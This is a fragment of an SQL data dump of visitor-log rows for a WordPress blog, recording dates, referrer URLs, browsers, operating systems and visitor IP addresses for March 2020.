(1262,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.226.147','000',0,4,0),
(1263,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.3.106','000',0,3,0),
(1264,'2020-03-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.69.196','000',0,1,0),
(1265,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.115.246','000',0,4,0),
(1266,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.239.17','000',0,3,0),
(1267,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','18.206.228.33','000',0,4,0),
(1268,'2020-03-22','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','54.189.38.180','000',0,2,0),
(1269,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.55.39.61','000',0,1,0),
(1270,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.192.142','000',0,4,0),
(1271,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.5','000',0,4,0),
(1272,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.49.79','000',0,2,0),
(1273,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.72.48','000',0,6,0),
(1274,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.5','000',0,4,0),
(1275,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.117.84','000',0,3,0),
(1276,'2020-03-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(1277,'2020-03-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.197.231','000',0,1,0),
(1278,'2020-03-22','http://www.design-arena.ir/blog','Internet Explorer','Windows','6.2',NULL,NULL,'','66.70.160.94','000',0,1,0),
(1279,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.62.21','000',0,10,0),
(1280,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.228.166','000',0,2,0),
(1281,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.35.38','000',0,3,0),
(1282,'2020-03-22','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','34.217.136.243','000',0,2,0),
(1283,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','23.239.26.240','000',0,1,0),
(1284,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.41.218','000',0,3,0),
(1285,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.114.126','000',0,3,0),
(1286,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.237.141.147','000',0,1,0),
(1287,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.4','000',0,2,0),
(1288,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.11.31','000',0,2,0),
(1289,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','178.148.255.137','000',0,1,0),
(1290,'2020-03-22','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','77.89.228.66','000',0,1,0),
(1291,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.219.148.43','000',0,1,0),
(1292,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.188.39','000',0,3,0),
(1293,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.6','000',0,4,0),
(1294,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.2.169','000',0,2,0),
(1295,'2020-03-22','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','151.240.167.47','000',0,2,0),
(1296,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.166.12','000',0,4,0),
(1297,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.102.0','000',0,4,0),
(1298,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.221.219.178','000',0,1,0),
(1299,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.182.75','000',0,5,0),
(1300,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.76.50.244','000',0,3,0),
(1301,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.123.147','000',0,2,0),
(1302,'2020-03-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.25.196.123','000',0,1,0),
(1303,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.212.22.61','000',0,1,0),
(1304,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.83.44','000',0,4,0),
(1305,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.187.175.53','000',0,2,0),
(1306,'2020-03-22','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,4,0),
(1307,'2020-03-22','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','37.239.252.196','000',0,1,0),
(1308,'2020-03-22','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','121.200.1.5','000',0,1,0),
(1309,'2020-03-22','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','5.117.107.153','000',0,1,0),
(1310,'2020-03-22','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','93.62.101.199','000',0,1,0),
(1311,'2020-03-22','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','186.102.191.135','000',0,1,0),
(1312,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','52.88.87.120','000',0,2,0),
(1313,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.189.80','000',0,2,0),
(1314,'2020-03-22','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','5.114.55.75','000',0,2,0),
(1315,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.77.90.133','000',0,4,0),
(1316,'2020-03-22','http://ictbank.ir/blog','Unknown','iOS','13.3',NULL,NULL,'','8.20.126.200','000',0,8,0),
(1317,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','3.82.209.119','000',0,1,0),
(1318,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.69.13.232','000',0,1,0),
(1319,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','52.43.115.54','000',0,1,0),
(1320,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.199.60.225','000',0,2,0),
(1321,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.25.41','000',0,3,0),
(1322,'2020-03-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,3,0),
(1323,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.185.253.25','000',0,1,0),
(1324,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.233.25.145','000',0,1,0),
(1325,'2020-03-22','http://ictbank.ir/blog','Chrome','OS X','10.12.3',NULL,NULL,'','174.128.181.166','000',0,1,0),
(1326,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.101','000',0,2,0),
(1327,'2020-03-22','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','164.138.183.141','000',0,3,0),
(1328,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.210.214.61','000',0,1,0),
(1329,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.84.77','000',0,2,0),
(1330,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','159.65.222.212','000',0,1,0),
(1331,'2020-03-22','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.155.30.101','000',0,6,0),
(1332,'2020-03-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.57.40.38','000',0,1,0),
(1333,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.167.252.210','000',0,2,0),
(1334,'2020-03-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.216.37','000',0,1,0),
(1335,'2020-03-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','196.244.191.58','000',0,1,0),
(1336,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','173.244.36.18','000',0,9,0),
(1337,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','162.219.176.42','000',0,5,0),
(1338,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','194.187.249.42','000',0,25,0),
(1339,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','86.105.25.75','000',0,61,0),
(1340,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','82.102.20.170','000',0,5,0),
(1341,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','185.230.125.85','000',0,12,0),
(1342,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','82.102.21.216','000',0,1,0),
(1343,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','217.138.205.109','000',0,14,0),
(1344,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','194.99.104.26','000',0,32,0),
(1345,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','45.12.220.229','000',0,1,0),
(1346,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','89.238.154.169','000',0,1,0),
(1347,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','37.120.208.80','000',0,24,0),
(1348,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','185.253.97.228','000',0,34,0),
(1349,'2020-03-22','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','217.138.205.202','000',0,9,0),
(1350,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.107.56','000',0,1,0),
(1351,'2020-03-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','196.52.10.19','000',0,81,0),
(1352,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.195.162.190','000',0,2,0),
(1353,'2020-03-22','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','83.31.39.7','000',0,4,0),
(1354,'2020-03-22','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','83.31.39.10','000',0,2,0),
(1355,'2020-03-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.208.220.134','000',0,63,0),
(1356,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','17.58.57.103','000',0,2,0),
(1357,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.241.198.172','000',0,1,0),
(1358,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.29.27','000',0,2,0),
(1359,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.240.113.41','000',0,1,0),
(1360,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.205.65.105','000',0,1,0),
(1361,'2020-03-22','http://ictbank.ir/blog','Firefox','OS X','10.9',NULL,NULL,'','90.154.102.15','000',0,1,0),
(1362,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','54.203.119.11','000',0,1,0),
(1363,'2020-03-22','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','5.210.77.139','000',0,1,0),
(1364,'2020-03-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','34.216.94.202','000',0,1,0),
(1365,'2020-03-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(1366,'2020-03-23','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,7,0),
(1367,'2020-03-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','45.33.3.122','000',0,2,0),
(1368,'2020-03-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','179.232.3.39','000',0,1,0),
(1369,'2020-03-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','179.40.60.77','000',0,1,0),
(1370,'2020-03-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','209.161.255.4','000',0,1,0),
(1371,'2020-03-23','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','45.6.95.196','000',0,1,0),
(1372,'2020-03-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.6','000',0,1,0),
(1373,'2020-03-23','http://82.102.9.14:80','Firefox','Windows','5.1',NULL,NULL,'','95.45.254.121','000',0,3,0),
(1374,'2020-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','112.102.227.96','000',0,1,0),
(1375,'2020-03-23','http://ictbank.ir/blog','Safari','iOS','13.3',NULL,NULL,'','213.127.32.76','000',0,1,0),
(1376,'2020-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.35.23','000',0,1,0),
(1377,'2020-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.190.25','000',0,1,0),
(1378,'2020-03-23','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','36.99.136.136','000',0,3,0),
(1379,'2020-03-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','191.34.252.197','000',0,1,0),
(1380,'2020-03-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','207.248.95.229','000',0,1,0),
(1381,'2020-03-23','https://www.google.com/','Chrome','Windows','6.2',NULL,NULL,'','189.203.155.133','000',0,1,0),
(1382,'2020-03-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','103.51.16.133','000',0,1,0),
(1383,'2020-03-23','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','36.99.136.137','000',0,1,0),
(1384,'2020-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.159.133','000',0,1,0),
(1385,'2020-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.65.237','000',0,1,0),
(1386,'2020-03-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.239.180.123','000',0,1,0),
(1387,'2020-03-23','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','192.230.43.65','000',0,2,0),
(1388,'2020-03-23','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','185.175.59.116','000',0,2,0),
(1389,'2020-03-23','http://ictbank.ir/blog','Internet Explorer','Windows','10.0',NULL,NULL,'','188.116.15.72','000',0,2,0),
(1390,'2020-03-23','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','188.116.55.76','000',0,2,0),
(1391,'2020-03-23','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','192.230.43.49','000',0,2,0),
(1392,'2020-03-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.200.22.122','000',0,2,0),
(1393,'2020-03-23','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','192.121.188.42','000',0,2,0),
(1394,'2020-03-23','http://ictbank.ir/blog','Internet Explorer','Windows','10.0',NULL,NULL,'','192.171.233.41','000',0,2,0),
(1395,'2020-03-23','http://ictbank.ir/blog','Chrome','OS X','10.13.1',NULL,NULL,'','178.33.111.194','000',0,1,0),
(1396,'2020-03-23','http://www.bing.com/search?q=amazon','Chrome','Windows','10.0',NULL,NULL,'','65.155.30.101','000',0,4,0),
(1397,'2020-03-23','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(1398,'2020-03-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(1399,'2020-03-23','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','176.31.33.84','000',0,1,0),
(1400,'2020-03-23','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','176.31.48.12','000',0,1,0),
(1401,'2020-03-23','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','173.249.22.173','000',0,2,0),
(1402,'2020-03-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(1403,'2020-03-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','201.174.126.231','000',0,1,0),
(1404,'2020-03-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','189.247.28.71','000',0,1,0),
(1405,'2020-03-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','45.248.26.165','000',0,1,0),
(1406,'2020-03-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','42.119.210.203','000',0,1,0),
(1407,'2020-03-24','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','217.182.69.216','000',0,1,0),
(1408,'2020-03-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.134.17.246','000',0,1,0),
(1409,'2020-03-24','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','206.189.16.203','000',0,1,0),
(1410,'2020-03-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(1411,'2020-03-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.131.10','000',0,1,0),
(1412,'2020-03-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.175.90','000',0,1,0),
(1413,'2020-03-24','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','178.35.233.234','000',0,1,0),
(1414,'2020-03-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.3.205','000',0,1,0),
(1415,'2020-03-24','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,1,0),
(1416,'2020-03-24','http://ictbank.ir/blog/index.php/2020/03/24/choosing-internet-gambling-house-is-without-a/','Firefox','Windows','6.1',NULL,NULL,'','185.153.196.7','000',0,1,0),
(1417,'2020-03-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','110.169.12.250','000',0,1,0),
(1418,'2020-03-24','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.191.214','000',0,1,0),
(1419,'2020-03-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.227.149','000',0,1,0),
(1420,'2020-03-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','64.53.242.197','000',0,1,0),
(1421,'2020-03-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','177.36.249.69','000',0,1,0),
(1422,'2020-03-24','https://www.google.com/','Chrome','Windows','6.3',NULL,NULL,'','152.156.168.5','000',0,1,0),
(1423,'2020-03-24','https://www.google.com/','Chrome','Windows','6.3',NULL,NULL,'','103.21.77.197','000',0,1,0),
(1424,'2020-03-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.66.114.103','000',0,1,0),
(1425,'2020-03-24','http://ictbank.ir/blog','Firefox','OS X','10.8',NULL,NULL,'','185.252.146.212','000',0,2,0),
(1426,'2020-03-24','http://ictbank.ir/blog','Samsung Internet','Android','10',NULL,NULL,'','172.27.249.96','000',0,2,0),
(1427,'2020-03-24','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,2,0),
(1428,'2020-03-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','52.87.213.12','000',0,7,0),
(1429,'2020-03-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','18.217.223.118','000',0,1,0),
(1430,'2020-03-24','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','34.83.22.32','000',0,8,0),
(1431,'2020-03-25','http://www.ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','195.154.181.60','000',0,3,0),
(1432,'2020-03-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(1433,'2020-03-25','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.222.36','000',0,1,0),
(1434,'2020-03-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,4,0),
(1435,'2020-03-25','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.154.226.109','000',0,1,0),
(1436,'2020-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','83.31.39.10','000',0,18,0),
(1437,'2020-03-25','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','83.31.39.7','000',0,18,0),
(1438,'2020-03-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.222.43.10','000',0,1,0),
(1439,'2020-03-25','http://ictbank.ir/blog','Safari','iOS','13.3.1',NULL,NULL,'','107.77.87.97','000',0,1,0),
(1440,'2020-03-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,2,0),
(1441,'2020-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.85.105','000',0,1,0),
(1442,'2020-03-25','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.198.147','000',0,1,0),
(1443,'2020-03-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.6','000',0,1,0),
(1444,'2020-03-25','https://l.instagram.com/','Instagram','Android','9',NULL,NULL,'','141.136.88.154','000',0,4,0),
(1445,'2020-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.160.136','000',0,1,0),
(1446,'2020-03-25','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','109.102.111.63','000',0,38,0),
(1447,'2020-03-25','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.155.30.101','000',0,1,0),
(1448,'2020-03-25','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','79.127.96.129','000',0,1,0),
(1449,'2020-03-25','http://82.102.9.14:80','Chrome','Windows','10.0',NULL,NULL,'','174.138.41.66','000',0,1,0),
(1450,'2020-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.166.209','000',0,1,0),
(1451,'2020-03-25','http://82.102.9.14:80/blog/wp-content/themes/chigue/wp_class_datalib.php','Safari','iOS','10.3.3',NULL,NULL,'','192.185.82.239','000',0,1,0),
(1452,'2020-03-25','http://82.102.9.14:80/blog/wp-content/themes/chigue/wp_class_datalib.php','Chrome','Windows','6.1',NULL,NULL,'','108.179.192.105','000',0,1,0),
(1453,'2020-03-25','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.39.26.157','000',0,1,0),
(1454,'2020-03-25','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.39.30.15','000',0,1,0),
(1455,'2020-03-25','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.172.141','000',0,1,0),
(1456,'2020-03-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.50.143','000',0,1,0),
(1457,'2020-03-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','44.234.47.195','000',0,1,0),
(1458,'2020-03-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.245.196.135','000',0,1,0),
(1459,'2020-03-25','http://ictbank.ir/blog','Safari','iOS','13.3.1',NULL,NULL,'','107.139.26.31','000',0,1,0),
(1460,'2020-03-25','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','188.143.169.29','000',0,2,0),
(1461,'2020-03-25','https://outlook.live.com/','Chrome','Windows','10.0',NULL,NULL,'','190.239.152.54','000',0,1,0),
(1462,'2020-03-25','http://ictbank.ir/blog','Android Browser','Android','2.3.3',NULL,NULL,'','201.103.29.192','000',0,1,0),
(1463,'2020-03-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.100','000',0,6,0),
(1464,'2020-03-26','http://www.bing.com/search?q=amazon','Internet Explorer','Windows','6.1',NULL,NULL,'','65.155.30.101','000',0,7,0),
(1465,'2020-03-26','http://www.bing.com/search?q=amazon','Chrome','Windows','10.0',NULL,NULL,'','65.154.226.109','000',0,3,0),
(1466,'2020-03-26','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','103.82.235.2','000',0,1,0),
(1467,'2020-03-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(1468,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.66.125','000',0,1,0),
(1469,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','37.59.164.172','000',0,1,0),
(1470,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','46.105.245.167','000',0,1,0),
(1471,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.32.145.91','000',0,1,0),
(1472,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.66.171','000',0,1,0),
(1473,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','37.59.67.61','000',0,1,0),
(1474,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','46.105.172.180','000',0,1,0),
(1475,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.181.176','000',0,1,0),
(1476,'2020-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.56.156.221','000',0,1,0),
(1477,'2020-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.77.69','000',0,1,0),
(1478,'2020-03-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','109.108.70.169','000',0,1,0),
(1479,'2020-03-26','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.229.1.215','000',0,2,0),
(1480,'2020-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.254.254','000',0,1,0),
(1481,'2020-03-26','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','34.91.141.67','000',0,3,0),
(1482,'2020-03-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.147.32','000',0,1,0),
(1483,'2020-03-26','http://ictbank.ir/blog','Safari','iOS','13.3.1',NULL,NULL,'','92.40.248.245','000',0,1,0),
(1484,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.32.254.24','000',0,1,0),
(1485,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.6.10','000',0,1,0),
(1486,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','178.33.172.141','000',0,1,0),
(1487,'2020-03-26','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.193.214','000',0,1,0),
